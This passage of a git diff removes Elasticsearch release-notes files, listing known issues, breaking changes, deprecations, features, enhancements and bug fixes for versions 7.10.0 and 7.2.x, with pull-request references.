-Search:: -* Fix cacheability of custom LongValuesSource in TermsSetQueryBuilder {es-pull}65367[#65367] -* SourceValueFetcher should check all possible source fields {es-pull}65375[#65375] - -Snapshot/Restore:: -* Fix Broken Error Handling in CacheFile#acquire {es-pull}65342[#65342] (issue: {es-issue}65302[#65302]) -* Fix Two Snapshot Clone State Machine Bugs {es-pull}65042[#65042] - - -[[release-notes-7.10.0]] -== {es} version 7.10.0 - -Also see <>. - -[[known-issues-7.10.0]] -[discrete] -=== Known issues - -* SQL: If a `WHERE` clause contains at least two relational operators joined by -`AND`, of which one is a comparison (`<=`, `<`, `>=`, `>`) and another one is -an inequality (`!=`, `<>`), both against literals or foldable expressions, the -inequality will be ignored. The workaround is to substitute the inequality -with a `NOT IN` operator. -+ -We have fixed this issue in {es} 7.10.1 and later versions. For more details, -see {es-issue}65488[#65488]. - -* There were several regressions around loading nested documents. These have been addressed in {es} 7.10.2. -** With multiple layers of nested `inner_hits`, we can fail to load the _source. ({es-issue}66577[#66577]) -** With nested `inner_hits`, the fast vector highlighter may load snippets from the wrong document. ({es-issue}65533[#65533]) -** When _source is disabled, we can fail load nested `inner_hits` and `top_hits`. ({es-issue}66572[#66572]) - -[[breaking-7.10.0]] -[float] -=== Breaking changes - -Authentication:: -* API key name should always be required for creation {es-pull}59836[#59836] (issue: {es-issue}59484[#59484]) - -Network:: -* Set specific keepalive options by default on supported platforms {es-pull}59278[#59278] - - - -[[breaking-java-7.10.0]] -[float] -=== Breaking Java changes - -Machine Learning:: -* Deprecate allow_no_jobs and allow_no_datafeeds in favor of allow_no_match {es-pull}60601[#60601] (issue: {es-issue}60642[#60642]) - -Mapping:: -* Pass SearchLookup supplier through to fielddataBuilder {es-pull}61430[#61430] (issue: {es-issue}59332[#59332]) - - - -[[deprecation-7.10.0]] -[float] -=== Deprecations - -Cluster Coordination:: -* Deprecate and ignore join timeout {es-pull}60872[#60872] (issue: {es-issue}60873[#60873]) - -Machine learning:: -* Renames \*/inference* APIs to \*/trained_models* {es-pull}63097[#63097] - -[[feature-7.10.0]] -[float] -=== New features - -Aggregations:: -* Add rate aggregation {es-pull}61369[#61369] (issue: {es-issue}60674[#60674]) - -Features/Features:: -* Add data tiers (hot, warm, cold, frozen) as custom node roles {es-pull}60994[#60994] (issue: {es-issue}60848[#60848]) -* Allocate newly created indices on data_hot tier nodes {es-pull}61342[#61342] (issue: {es-issue}60848[#60848]) - -Features/ILM+SLM:: -* ILM migrate data between tiers {es-pull}61377[#61377] (issue: {es-issue}60848[#60848]) -* ILM: add force-merge step to searchable snapshots action {es-pull}60819[#60819] (issues: {es-issue}53488[#53488], {es-issue}56215[#56215]) - -Machine Learning:: -* Implement AucRoc metric for classification {es-pull}60502[#60502] (issue: {es-issue}62160[#62160]) - -Mapping:: -* Introduce 64-bit unsigned long field type {es-pull}60050[#60050] (issue: {es-issue}32434[#32434]) - -Search:: -* Add search 'fields' option to support high-level field retrieval {es-pull}60100[#60100] (issues: {es-issue}49028[#49028], {es-issue}55363[#55363]) - - - -[[enhancement-7.10.0]] -[float] -=== Enhancements - -Aggregations:: -* Adds hard_bounds to histogram aggregations {es-pull}59175[#59175] (issue: {es-issue}50109[#50109]) -* Allocate slightly less per bucket {es-pull}59740[#59740] -* Improve reduction of terms aggregations {es-pull}61779[#61779] (issue: {es-issue}51857[#51857]) -* Speed up date_histogram by precomputing ranges {es-pull}61467[#61467] - -Analysis:: -* Support ignore_keywords flag for word delimiter graph token filter {es-pull}59563[#59563] (issue: {es-issue}59491[#59491]) - -Authentication:: -* Cache API key doc to reduce traffic to the security index {es-pull}59376[#59376] (issues: {es-issue}53940[#53940], {es-issue}55836[#55836]) -* Include authentication type for the authenticate response {es-pull}61247[#61247] (issue: {es-issue}61130[#61130]) -* Oidc additional client auth types {es-pull}58708[#58708] -* Warn about unlicensed realms if no auth token can be extracted {es-pull}61402[#61402] (issue: {es-issue}61090[#61090]) - -Authorization:: -* Add DEBUG logging for undefined role mapping field {es-pull}61246[#61246] (issue: {es-issue}48562[#48562]) -* Add more context to index access denied errors {es-pull}60357[#60357] (issue: {es-issue}42166[#42166]) - -CRUD:: -* Add configured indexing memory limit to node stats {es-pull}60342[#60342] -* Dedicated threadpool for system index writes {es-pull}61655[#61655] - -Cluster Coordination:: -* Add more useful toString on cluster state observers {es-pull}60277[#60277] -* Fail invalid incremental cluster state writes {es-pull}61030[#61030] -* Provide option to allow writes when master is down {es-pull}60605[#60605] - -Distributed:: -* Detect noop of update index settings {es-pull}61348[#61348] -* Thread safe clean up of LocalNodeModeListeners {es-pull}59932[#59932] (issue: {es-issue}59801[#59801]) - -Features/CAT APIs:: -* Adding Hit counts and Miss counts for QueryCache exposed through REST API {es-pull}60114[#60114] (issue: {es-issue}48645[#48645]) - -Features/Features:: -* Add aggregation list to node info {es-pull}60074[#60074] (issue: {es-issue}52057[#52057]) -* Adding new `require_alias` option to indexing requests {es-pull}58917[#58917] (issue: {es-issue}55267[#55267]) - -Features/ILM+SLM:: -* Move internal index templates to composable templates {es-pull}61457[#61457] - -Features/Ingest:: -* Add network from MaxMind Geo ASN database {es-pull}61676[#61676] -* Allow_duplicates option for append processor {es-pull}61916[#61916] (issue: {es-issue}57543[#57543]) -* Configurable output format for date processor {es-pull}61324[#61324] (issue: {es-issue}42523[#42523]) -* Enhance the ingest node simulate verbose output {es-pull}60433[#60433] (issue: {es-issue}56004[#56004]) -* Per processor description for verbose simulate {es-pull}58207[#58207] (issue: {es-issue}57906[#57906]) -* Preserve grok pattern ordering and add sort option {es-pull}61671[#61671] (issue: {es-issue}40819[#40819]) - -Features/Java High Level REST Client:: -* HLRC: UpdateByQuery API with wait_for_completion being false {es-pull}58552[#58552] (issues: {es-issue}35202[#35202], {es-issue}46350[#46350]) - -Infra/Core:: -* Add logstash system index APIs {es-pull}53350[#53350] -* Deprecate REST access to System Indices {es-pull}60945[#60945] -* Speed up Compression Logic by Pooling Resources {es-pull}61358[#61358] -* System index reads in separate threadpool {es-pull}57936[#57936] (issues: {es-issue}37867[#37867], {es-issue}50251[#50251]) - -Infra/Logging:: -* Do not create two loggers for DeprecationLogger {es-pull}58435[#58435] -* Header warning logging refactoring {es-pull}55941[#55941] (issues: {es-issue}52369[#52369], {es-issue}55699[#55699]) -* Write deprecation logs to a data stream {es-pull}61484[#61484] (issues: {es-issue}46106[#46106], {es-issue}61474[#61474]) - -Infra/Packaging:: -* Add UBI docker builds {es-pull}60742[#60742] -* Upgrade Centos version in Dockerfile to 8 {es-pull}59019[#59019] - -Infra/Resiliency:: -* Remove node from cluster when node locks broken {es-pull}61400[#61400] (issues: {es-issue}52680[#52680], {es-issue}58373[#58373]) - -Infra/Scripting:: -* Augment String with sha1 and sha256 {es-pull}59671[#59671] (issue: {es-issue}59633[#59633]) -* Converts casting and def support {es-pull}61350[#61350] (issue: {es-issue}59647[#59647]) - -Machine Learning:: -* Add a "verbose" option to the data frame analytics stats endpoint {es-pull}59589[#59589] (issue: {es-issue}59125[#59125]) -* Add new include flag to get trained models API for model training metadata {es-pull}61922[#61922] -* Add new feature_processors field for data frame analytics {es-pull}60528[#60528] (issue: {es-issue}59327[#59327]) -* Add new n_gram_encoding custom processor {es-pull}61578[#61578] -* During nightly maintenance delete jobs whose original deletion tasks were lost {es-pull}60121[#60121] (issue: {es-issue}42840[#42840]) -* Suspend persistence of trained model stats when ML upgrade mode is enabled {es-pull}61143[#61143] -* Calculate total feature importance to store with model metadata {ml-pull}1387[#1387] -* Change outlier detection feature_influence format to array with nested objects {ml-pull}1475[#1475], {es-pull}62068[#62068] -* Add timeouts to named pipe connections {ml-pull}1514[#1514], {es-pull}62993[#62993] (issue: {ml-issue}1504[#1504]) - -Mapping:: -* Add field type for version strings {es-pull}59773[#59773] (issue: {es-issue}48878[#48878]) -* Allow [null] values in [null_value] {es-pull}61798[#61798] (issues: {es-issue}7978[#7978], {es-issue}58823[#58823]) -* Allow metadata fields in the _source {es-pull}61590[#61590] (issue: {es-issue}58339[#58339]) - -Network:: -* Improve deserialization failure logging {es-pull}60577[#60577] (issue: {es-issue}38939[#38939]) -* Log and track open/close of transport connections {es-pull}60297[#60297] - -Performance:: -* Speed up empty highlighting many fields {es-pull}61860[#61860] - -SQL:: -* Add option to provide the delimiter for the CSV format {es-pull}59907[#59907] (issue: {es-issue}41634[#41634]) -* Implement DATE_PARSE function for parsing strings into DATE values {es-pull}57391[#57391] (issue: {es-issue}54962[#54962]) -* Implement FORMAT function {es-pull}55454[#55454] (issue: {es-issue}54965[#54965]) - -Search:: -* Avoid reloading _source for every inner hit {es-pull}60494[#60494] (issue: {es-issue}32818[#32818]) -* Cancel multisearch when http connection closed {es-pull}61399[#61399] -* Enable cancellation for msearch requests {es-pull}61337[#61337] -* Executes incremental reduce in the search thread pool {es-pull}58461[#58461] (issues: {es-issue}51857[#51857], {es-issue}53411[#53411]) -* Introduce point in time APIs in x-pack basic {es-pull}61062[#61062] (issues: {es-issue}26472[#26472], {es-issue}46523[#46523]) -* ParametrizedFieldMapper to run validators against default value {es-pull}60042[#60042] (issue: {es-issue}59332[#59332]) -* Add case insensitive flag for "term" family of queries {es-pull}61596[#61596] (issue: {es-issue}61546[#61546]) -* Add case insensitive support for regex queries {es-pull}59441[#59441] -* Tweak toXContent implementation of ParametrizedFieldMapper {es-pull}59968[#59968] -* Implement fields value fetching for the `text`, `search_as_you_type` and `token_count` field types {es-pull}63515[#63515] -* Make term/prefix/wildcard/regex query parsing more lenient, with respect to the `case_insensitive` flag {es-pull}63926[#63926] (issue: {es-issue}63893[#63893]) - -Snapshot/Restore:: -* Add repositories metering API {es-pull}60371[#60371] -* Clone Snapshot API {es-pull}61839[#61839] -* Determine shard size before allocating shards recovering from snapshots {es-pull}61906[#61906] -* Introduce index based snapshot blob cache for Searchable Snapshots {es-pull}60522[#60522] -* Validate snapshot UUID during restore {es-pull}59601[#59601] (issue: {es-issue}50999[#50999]) - -Store:: -* Report more details of unobtainable ShardLock {es-pull}61255[#61255] (issue: {es-issue}38807[#38807]) - - -Transform:: -* Add support for missing bucket {es-pull}59591[#59591] (issues: {es-issue}42941[#42941], {es-issue}55102[#55102]) - - - -[[bug-7.10.0]] -[float] -=== Bug fixes - -Aggregations:: -* Fix AOOBE when setting min_doc_count to 0 in significant_terms {es-pull}60823[#60823] (issues: {es-issue}60683[#60683], {es-issue}60824[#60824]) -* Make sure non-collecting aggs include sub-aggs {es-pull}64214[#64214] (issue: {es-issue}64142[#64142]) -* Composite aggregation must check live docs when the index is sorted {es-pull}63864[#63864] -* Fix broken parent and child aggregator {es-pull}63811[#63811] - -Allocation:: -* Fix scheduling of ClusterInfoService#refresh {es-pull}59880[#59880] - -Authorization:: -* Fix doc-update interceptor for indices with DLS and FLS {es-pull}61516[#61516] -* Report anonymous roles in authenticate response {es-pull}61355[#61355] (issues: {es-issue}47195[#47195], {es-issue}53453[#53453], {es-issue}57711[#57711], {es-issue}57853[#57853]) -* Add view_index_metadata privilege over metricbeat-* for monitoring agent {es-pull}63750[#63750] (issue: {es-issue}63750[#63750]) - -CRUD:: -* Propagate forceExecution when acquiring permit {es-pull}60634[#60634] (issue: {es-issue}60359[#60359]) - -Cluster Coordination:: -* Reduce allocations when persisting cluster state {es-pull}61159[#61159] - -Distributed:: -* Fix cluster health rest api wait_for_no_initializing_shards bug {es-pull}58379[#58379] -* Fix cluster health when closing {es-pull}61709[#61709] - -Engine:: -* Fix estimate size of translog operations {es-pull}59206[#59206] - -Features/ILM+SLM:: -* Fix ILM history index settings {es-pull}61880[#61880] (issues: {es-issue}61457[#61457], {es-issue}61863[#61863]) -* Ensure cancelled SLM jobs do not continue to run {es-pull}63762[#63762] (issue: {es-issue}63754[#63754]) - -Features/Java Low Level REST Client:: -* Handle non-default port in Cloud-Id {es-pull}61581[#61581] - -Features/Stats:: -* Remove sporadic min/max usage estimates from stats {es-pull}59755[#59755] - -Features/Watcher:: -* Correct the query dsl for watching elasticsearch version {es-pull}58321[#58321] (issue: {es-issue}58261[#58261]) -* Fix passing params to template or script failed in watcher {es-pull}58559[#58559] (issue: {es-issue}57625[#57625]) - -Geo:: -* Fix wrong NaN comparison {es-pull}61795[#61795] (issue: {es-issue}48207[#48207]) - -Infra/Core:: -* Throws IndexNotFoundException in TransportGetAction for unknown System indices {es-pull}61785[#61785] (issue: {es-issue}57936[#57936]) -* Handle missing logstash index exceptions {es-pull}63698[#63698] -* XPack Usage API should run on MANAGEMENT threads {es-pull}64160[#64160] - -Infra/Packaging:: -* Allow running the Docker image with a non-default group {es-pull}61194[#61194] (issue: {es-issue}60864[#60864]) -* Set the systemd initial timeout to 75 seconds {es-pull}60345[#60345] (issue: {es-issue}60140[#60140]) - -Machine Learning:: -* Adjusting inference processor to support foreach usage {es-pull}60915[#60915] (issue: {es-issue}60867[#60867]) -* Get data frame analytics jobs stats API can return multiple responses if more than one error {es-pull}60900[#60900] (issue: {es-issue}60876[#60876]) -* Do not mark the data frame analytics job as FAILED when a failure occurs after the node is shutdown {es-pull}61331[#61331] (issue: {es-issue}60596[#60596]) -* Improve handling of exception while starting data frame analytics process {es-pull}61838[#61838] (issue: {es-issue}61704[#61704]) -* Fix progress on resume after final training has completed for classification and regression. Previously, progress was shown stuck at zero for final training. {ml-pull}1443[#1443] -* Avoid potential "Failed to compute quantile" and "No values added to quantile sketch" log errors training regression and classification models if there are features with mostly missing values {ml-pull}1500[#1500] -* Correct the anomaly detection job model state `min_version` {ml-pull}1546[#1546] - -Mapping:: -* Improve 'ignore_malformed' handling for dates {es-pull}60211[#60211] (issue: {es-issue}52634[#52634]) - -Network:: -* Let `isInetAddress` utility understand the scope ID on ipv6 {es-pull}60172[#60172] (issue: {es-issue}60115[#60115]) -* Suppress noisy SSL exceptions {es-pull}61359[#61359] - -Search:: -* Allows nanosecond resolution in search_after {es-pull}60328[#60328] (issue: {es-issue}52424[#52424]) -* Consolidate validation for 'docvalue_fields' {es-pull}59473[#59473] -* Correct how field retrieval handles multifields and copy_to {es-pull}61309[#61309] (issue: {es-issue}61033[#61033]) -* Apply boost only once for distance_feature query {es-pull}63767[#63767] -* Fixed NullPointerException in `significant_text` aggregation when field does not exist {es-pull}64144[#64144] (issue: {es-issue}64045[#64045]) -* Fix async search to retry updates on version conflict {es-pull}63652[#63652] (issue: {es-issue}63213[#63213]) -* Fix sorted query when date_nanos is used as the numeric_type {es-pull}64183[#64183] (issue: {es-issue}63719[#63719]) - -Snapshot/Restore:: -* Avoid listener call under SparseFileTracker#mutex {es-pull}61626[#61626] (issue: {es-issue}61520[#61520]) -* Ensure repo not in use for wildcard repo deletes {es-pull}60947[#60947] -* Fix Test Failure in testCorrectCountsForDoneShards {es-pull}60254[#60254] (issue: {es-issue}60247[#60247]) -* Minimize cache file locking during prewarming {es-pull}61837[#61837] (issue: {es-issue}58658[#58658]) -* Prevent snapshots to be mounted as system indices {es-pull}61517[#61517] (issue: {es-issue}60522[#60522]) -* Make Searchable Snapshot's CacheFile Lock less {es-pull}63911[#63911] (issue: {es-issue}63586[#63586]) -* Don't Generate an Index Setting History UUID unless it's supported {es-pull}64213[#64213] (issue: {es-issue}64152[#64152]) - -SQL:: -* Allow unescaped wildcard (*) in LIKE pattern {es-pull}63428[#63428] (issue: {es-issue}55108[#55108]) -* Validate integer paramete in string functions {es-pull}63728[#63728] (issue: {es-issue}58923[#58923]) -* Remove filter from field_caps requests {es-pull}63840[#63840] (issue: {es-issue}63832[#63832]) - - - -[[upgrade-7.10.0]] -[discrete] -=== Upgrades - -Infra/Packaging:: -* Upgrade bundled JDK to 15.0.1 and switch to AdoptOpenJDK {es-pull}64253[#64253] - -Store:: -* Upgrade to Lucene-8.7.0 {es-pull}64532[#64532] diff --git a/docs/reference/release-notes/7.2.asciidoc b/docs/reference/release-notes/7.2.asciidoc deleted file mode 100644 index a980e370cdd..00000000000 --- a/docs/reference/release-notes/7.2.asciidoc +++ /dev/null @@ -1,576 +0,0 @@ -[[release-notes-7.2.1]] -== {es} version 7.2.1 - -Also see <>. - -[[enhancement-7.2.1]] -[discrete] -=== Enhancements - -Infra/Core:: -* Add default CLI JVM options {es-pull}44545[#44545] (issue: {es-issue}42021[#42021]) - -Infra/Plugins:: -* Do not checksum all bytes at once in plugin install {es-pull}44649[#44649] (issue: {es-issue}44545[#44545]) - -Machine Learning:: -* Improve message when native controller cannot connect {es-pull}43565[#43565] (issue: {es-issue}42341[#42341]) -* Introduce a setting for the process connect timeout {es-pull}43234[#43234] - -[[bug-7.2.1]] -[discrete] -=== Bug fixes - -Analysis:: -* Issue deprecation warnings for preconfigured delimited_payload_filter {es-pull}43684[#43684] (issues: {es-issue}26625[#26625], {es-issue}43568[#43568]) - -Authentication:: -* Fix credential encoding for OIDC token request {es-pull}43808[#43808] (issue: {es-issue}43709[#43709]) - -Data Frame:: -* Reorder format priorities in dest mapping {es-pull}43602[#43602] -* Adjust error message {es-pull}43455[#43455] -* Size the GET stats search by number of Ids requested {es-pull}43206[#43206] (issue: {es-issue}43203[#43203]) - -Distributed:: -* Fix DefaultShardOperationFailedException subclass xcontent serialization {es-pull}43435[#43435] (issue: {es-issue}43423[#43423]) - -Engine:: -* AsyncIOProcessor preserve thread context {es-pull}43729[#43729] - -Features/CAT APIs:: -* Fix indices shown in _cat/indices {es-pull}43286[#43286] (issues: {es-issue}33888[#33888], {es-issue}38824[#38824], {es-issue}39933[#39933]) - -Features/ILM:: -* Account for node versions during allocation in ILM Shrink {es-pull}43300[#43300] (issue: {es-issue}41879[#41879]) - -Features/Indices APIs:: -* Check shard limit after applying index templates {es-pull}44619[#44619] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567], {es-issue}44619[#44619]) -* Validate index settings after applying templates {es-pull}44612[#44612] (issues: {es-issue}34021[#34021], {es-issue}44567[#44567]) -* Prevent NullPointerException in TransportRolloverAction {es-pull}43353[#43353] (issue: {es-issue}43296[#43296]) - -Infra/Packaging:: -* Restore setting up temp dir for windows service {es-pull}44541[#44541] -* Fix the bundled jdk flag to be passed through windows startup {es-pull}43502[#43502] - -Machine Learning:: -* Fix datafeed checks when a concrete remote index is present {es-pull}43923[#43923] -* Don't persist model state at the end of lookback if the lookback did not generate any input {ml-pull}527[#527] (issue: {ml-issue}519[#519]) -* Don't write model size stats when job is closed without any input {ml-pull}516[#516] (issue: {ml-issue}394[#394]) - -Mapping:: -* Prevent types deprecation warning for indices.exists requests {es-pull}43963[#43963] (issue: {es-issue}43905[#43905]) -* Add include_type_name in indices.exitst REST API spec {es-pull}43910[#43910] (issue: {es-issue}43905[#43905]) -* Fix index_prefix sub field name on nested text fields {es-pull}43862[#43862] (issue: {es-issue}43741[#43741]) - -Network:: -* Reconnect remote cluster when seeds are changed {es-pull}43379[#43379] (issue: {es-issue}37799[#37799]) - -SQL:: -* Fix NPE in case of subsequent scrolled requests for a CSV/TSV formatted response {es-pull}43365[#43365] (issue: {es-issue}43327[#43327]) -* Increase hard limit for sorting on aggregates {es-pull}43220[#43220] (issue: {es-issue}43168[#43168]) - -Search:: -* Fix wrong logic in `match_phrase` query with multi-word synonyms {es-pull}43941[#43941] (issue: {es-issue}43308[#43308]) -* Fix UOE on search requests that match a sparse role query {es-pull}43668[#43668] (issue: {es-issue}42857[#42857]) -* Fix propagation of enablePositionIncrements in QueryStringQueryBuilder {es-pull}43578[#43578] (issue: {es-issue}43574[#43574]) -* Fix round up of date range without rounding {es-pull}43303[#43303] (issue: {es-issue}43277[#43277]) - -Security:: -* SecurityIndexSearcherWrapper doesn't always carry over caches and similarity {es-pull}43436[#43436] - - -[[release-notes-7.2.0]] -== {es} version 7.2.0 - -Also see <>. - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - -[[breaking-7.2.0]] -[discrete] -=== Breaking changes - -Cluster Coordination:: -* Reject port ranges in `discovery.seed_hosts` {es-pull}41404[#41404] (issue: {es-issue}40786[#40786]) - - -[[breaking-java-7.2.0]] -[discrete] -=== Breaking Java changes - -Infra/Plugins:: -* Remove IndexStore and DirectoryService {es-pull}42446[#42446] - - -[[deprecation-7.2.0]] -[discrete] -=== Deprecations - -Authorization:: -* Deprecate permission over aliases {es-pull}38059[#38059] - -Features/Features:: -* Add deprecation check for ILM poll interval <1s {es-pull}41096[#41096] (issue: {es-issue}39163[#39163]) - -Mapping:: -* Enforce Completion Context Limit {es-pull}38675[#38675] (issue: {es-issue}32741[#32741]) - -Reindex:: -* Reindex from remote deprecation of escaped index {es-pull}41005[#41005] (issue: {es-issue}40303[#40303]) - -Search:: -* Deprecate using 0 value for `min_children` in `has_child` query #41548 {es-pull}41555[#41555] (issue: {es-issue}41548[#41548]) -* Deprecate support for first line empty in msearch API {es-pull}41442[#41442] (issue: {es-issue}41011[#41011]) - -Security:: -* Deprecate the native realm migration tool {es-pull}42142[#42142] - -[[feature-7.2.0]] -[discrete] -=== New features - -Authentication:: -* Add an OpenID Connect authentication realm {es-pull}40674[#40674] - -Distributed:: -* Add support for replicating closed indices {es-pull}39499[#39499] (issues: {es-issue}33888[#33888], {es-issue}33903[#33903], {es-issue}37359[#37359], {es-issue}37413[#37413], {es-issue}38024[#38024], {es-issue}38326[#38326], {es-issue}38327[#38327], {es-issue}38329[#38329], {es-issue}38421[#38421], {es-issue}38631[#38631], {es-issue}38767[#38767], {es-issue}38854[#38854], {es-issue}38955[#38955], {es-issue}39006[#39006], {es-issue}39110[#39110], {es-issue}39186[#39186], {es-issue}39249[#39249], {es-issue}39364[#39364]) - -Infra/Scripting:: -* Add painless string split function (splitOnToken) {es-pull}39772[#39772] (issue: {es-issue}20952[#20952]) -* Add a Painless Context REST API {es-pull}39382[#39382] - -Machine Learning:: -* Add data frame feature {es-pull}38934[#38934] - -Ranking:: -* Expose proximity boosting {es-pull}39385[#39385] (issue: {es-issue}33382[#33382]) -* Add randomScore function in script_score query {es-pull}40186[#40186] (issue: {es-issue}31461[#31461]) - -SQL:: -* Add initial geo support {es-pull}42031[#42031] (issues: {es-issue}29872[#29872], {es-issue}37206[#37206]) -* Implement CASE... WHEN... THEN... ELSE... END {es-pull}41349[#41349] (issue: {es-issue}36200[#36200]) -* Introduce MAD (MedianAbsoluteDeviation) aggregation {es-pull}40048[#40048] (issue: {es-issue}39597[#39597]) -* Introduce SQL TIME data type {es-pull}39802[#39802] (issue: {es-issue}38174[#38174]) -* Introduce the columnar option for REST requests {es-pull}39287[#39287] (issue: {es-issue}37702[#37702]) - -Snapshot/Restore:: -* Allow snapshotting replicated closed indices {es-pull}39644[#39644] (issue: {es-issue}33888[#33888]) - -Suggesters:: -* Search as you type fieldmapper {es-pull}35600[#35600] (issue: {es-issue}33160[#33160]) - -Features/Ingest:: -* Add HTML strip processor {es-pull}41888[#41888] - -Search:: -* Add an option to force the numeric type of a field sort {es-pull}38095[#38095] (issue: {es-issue}32601[#32601]) - - -[[enhancement-7.2.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Use the breadth first collection mode for significant terms aggs. {es-pull}29042[#29042] (issue: {es-issue}28652[#28652]) -* Disallow null/empty or duplicate composite sources {es-pull}41359[#41359] (issue: {es-issue}32414[#32414]) -* Move top-level pipeline aggs out of QuerySearchResult {es-pull}40319[#40319] (issue: {es-issue}40177[#40177]) -* Remove throws IOException from PipelineAggregationBuilder#create {es-pull}40222[#40222] -* Better error messages when pipelines reference incompatible aggs {es-pull}40068[#40068] (issues: {es-issue}25273[#25273], {es-issue}30152[#30152]) -* Do not allow Sampler to allocate more than maxDoc size, better CB accounting {es-pull}39381[#39381] (issue: {es-issue}34269[#34269]) -* Force selection of calendar or fixed intervals in date histo agg {es-pull}33727[#33727] - -Allocation:: -* Reset failed allocation counter before executing routing commands {es-pull}41050[#41050] (issue: {es-issue}39546[#39546]) -* Supporting automatic release of index blocks. Closes #39334 {es-pull}40338[#40338] (issue: {es-issue}39334[#39334]) - -Analysis:: -* Add flag to declare token filters as updateable {es-pull}36103[#36103] (issue: {es-issue}29051[#29051]) - -Authentication:: -* Hash token values for storage {es-pull}41792[#41792] (issues: {es-issue}39631[#39631], {es-issue}40765[#40765]) -* Security Tokens moved to a new separate index {es-pull}40742[#40742] (issue: {es-issue}34454[#34454]) -* Support concurrent refresh of refresh tokens {es-pull}39631[#39631] (issue: {es-issue}36872[#36872]) -* Add enabled status for token and api key service {es-pull}38687[#38687] (issue: {es-issue}38535[#38535]) - -Authorization:: -* Support mustache templates in role mappings {es-pull}39984[#39984] (issue: {es-issue}36567[#36567]) -* Add .code_internal-* index pattern to kibana user {es-pull}42247[#42247] -* Add granular API key privileges {es-pull}41488[#41488] (issue: {es-issue}40031[#40031]) -* Add Kibana application privileges for monitoring and ml reserved roles {es-pull}40651[#40651] -* Support roles with application privileges against wildcard applications {es-pull}40398[#40398] - -CCR:: -* Replay history of operations in remote recovery {es-pull}39153[#39153] (issues: {es-issue}35975[#35975], {es-issue}39000[#39000]) - -CRUD:: -* Add details to BulkShardRequest#getDescription() {es-pull}41711[#41711] -* Add version-based validation to reindex requests {es-pull}38504[#38504] (issue: {es-issue}37855[#37855]) - -Cluster Coordination:: -* Add GET /_cluster/master endpoint {es-pull}40047[#40047] -* Only connect to new nodes on new cluster state {es-pull}39629[#39629] (issues: {es-issue}29025[#29025], {es-issue}31547[#31547]) -* Add has_voting_exclusions flag to cluster health output {es-pull}38568[#38568] - -Data Frame:: -* Persist and restore checkpoint and position {es-pull}41942[#41942] (issue: {es-issue}41752[#41752]) -* Complete the Data Frame task on stop {es-pull}41752[#41752] -* Data Frame stop all {es-pull}41156[#41156] -* Data Frame HLRC Get Stats API {es-pull}40327[#40327] -* Data Frame HLRC Get API {es-pull}40209[#40209] -* Data Frame HLRC Preview API {es-pull}40206[#40206] -* Data Frame HLRC start & stop APIs {es-pull}40154[#40154] (issue: {es-issue}29546[#29546]) -* Add Data Frame client to the Java HLRC {es-pull}39921[#39921] - -Discovery-Plugins:: -* Upgrade SDK and test discovery-ec2 credential providers {es-pull}41732[#41732] - -Distributed:: -* Prevent in-place downgrades and invalid upgrades {es-pull}41731[#41731] -* Add index name to cluster block exception {es-pull}41489[#41489] (issue: {es-issue}40870[#40870]) -* Noop peer recoveries on closed index {es-pull}41400[#41400] (issue: {es-issue}33888[#33888]) -* Do not trim unsafe commits when open readonly engine {es-pull}41041[#41041] (issue: {es-issue}33888[#33888]) -* Avoid background sync on relocated primary {es-pull}40800[#40800] (issue: {es-issue}40731[#40731]) -* No mapper service and index caches for replicated closed indices {es-pull}40423[#40423] -* Add support for replicating closed indices {es-pull}39499[#39499] (issues: {es-issue}33888[#33888], {es-issue}33903[#33903], {es-issue}37359[#37359], {es-issue}37413[#37413], {es-issue}38024[#38024], {es-issue}38326[#38326], {es-issue}38327[#38327], {es-issue}38329[#38329], {es-issue}38421[#38421], {es-issue}38631[#38631], {es-issue}38767[#38767], {es-issue}38854[#38854], {es-issue}38955[#38955], {es-issue}39006[#39006], {es-issue}39110[#39110], {es-issue}39186[#39186], {es-issue}39249[#39249], {es-issue}39364[#39364]) - -Docs Infrastructure:: -* Docs: Simplifying setup by using module configuration variant syntax {es-pull}40879[#40879] - -Engine:: -* Simplify initialization of max_seq_no of updates {es-pull}41161[#41161] (issues: {es-issue}33842[#33842], {es-issue}40249[#40249]) -* Adjust init map size of user data of index commit {es-pull}40965[#40965] -* Don't mark shard as refreshPending on stats fetching {es-pull}40458[#40458] (issues: {es-issue}33835[#33835], {es-issue}33847[#33847]) -* Reject illegal flush parameters {es-pull}40213[#40213] (issue: {es-issue}36342[#36342]) -* Always fail engine if delete operation fails {es-pull}40117[#40117] (issue: {es-issue}33256[#33256]) -* Combine overriddenOps and skippedOps in translog {es-pull}39771[#39771] (issue: {es-issue}33317[#33317]) -* Return cached segments stats if `include_unloaded_segments` is true {es-pull}39698[#39698] (issue: {es-issue}39512[#39512]) -* Allow inclusion of unloaded segments in stats {es-pull}39512[#39512] -* Never block on scheduled refresh if a refresh is running {es-pull}39462[#39462] -* Expose external refreshes through the stats API {es-pull}38643[#38643] (issue: {es-issue}36712[#36712]) -* Make setting index.translog.sync_interval be dynamic {es-pull}37382[#37382] (issue: {es-issue}32763[#32763]) - -Features/CAT APIs:: -* Add start and stop time to cat recovery API {es-pull}40378[#40378] -* Return 0 for negative "free" and "total" memory reported by the OS {es-pull}42725[#42725] (issue: {es-issue}42157[#42157]) - -Features/Indices APIs:: -* Introduce aliases version {es-pull}41397[#41397] (issue: {es-issue}41396[#41396]) -* Improve error message for absence of indices {es-pull}39789[#39789] (issues: {es-issue}38964[#38964], {es-issue}39296[#39296]) -* Improved error message for absence of indices closes #38964 {es-pull}39296[#39296] - -Features/Java High Level REST Client:: -* Added param ignore_throttled=false when indicesOptions.ignoreThrottle… {es-pull}42393[#42393] (issue: {es-issue}42358[#42358]) -* Ignore 409 conflict in reindex responses {es-pull}39543[#39543] - -Features/Monitoring:: -* Add packaging to cluster stats response {es-pull}41048[#41048] (issue: {es-issue}39378[#39378]) - -Geo:: -* Improve accuracy for Geo Centroid Aggregation {es-pull}41033[#41033] (issue: {es-issue}41032[#41032]) -* Add support for z values to libs/geo classes {es-pull}38921[#38921] -* Add ST_WktToSQL function {es-pull}35416[#35416] (issue: 